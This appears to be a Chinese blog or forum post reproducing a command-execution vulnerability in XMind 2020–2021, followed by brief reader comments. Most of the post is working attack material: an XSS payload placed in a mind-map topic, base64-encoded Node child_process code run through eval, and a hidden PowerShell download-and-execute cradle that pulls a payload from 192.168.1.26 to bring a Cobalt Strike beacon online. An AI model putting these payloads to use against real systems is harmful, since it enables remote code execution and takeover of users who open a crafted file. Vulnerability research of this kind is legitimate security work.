Xmind命令执行漏洞复现

简介

XMind 是一款专业的全球领先的商业思维导图软件,在国内使用广泛,拥有强大的功能、包括思维管理、商务演示、与办公软件协同工作等功能。它采用全球先进的Eclipse RCP软件架构,是集思维导图与头脑风暴于一体的可视化思考工具,能用来捕捉想法、理清思路、管理复杂信息并促进团队协作。XMind思维导图软件曾被著名互联网媒体Lifehacker评选为“最佳头脑风暴和思维导图工具”及”最受欢迎的思维导图软件”。

影响范围

XMind 2020—XMind 2021 bate11 都存在此漏洞

漏洞复现

到官网下载最新版本的XMind并安装


2
3

打开,测试xss漏洞

创建个模板,在主题中输入,payload,然后点击大纲,在大纲页面保存或者光标移到主题栏然后下移都能触发漏洞

xss payload

<img src=1 onerror=alert(1)>

构造执行命令payload

whoami

const tenet = require('child_process')
tenet.exec('whoami',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

base64编码

Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

最终payload

<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygnd2hvYW1pJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>

执行ipconfig /all

cs上线

采用PowerShell上线

8

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.26:80/xmind'))"

构造执行命令payload

const tenet = require('child_process')
tenet.exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.1.26:80/xmind\'))"',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

base64编码

Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=

最终payload

<img src=x onerror='eval(new Buffer(`Y29uc3QgdGVuZXQgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykKdGVuZXQuZXhlYygncG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLWMgIklFWCAoKG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoXCdodHRwOi8vMTkyLjE2OC4xLjI2OjgwL3htaW5kXCcpKSInLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

成功上线
我的博客 kosakd.top

夜猫子啊

:joy::joy::joy:

xmind202007272308 不能复现

:face_with_monocle:原创作者路过

xmind 202107130605不能复现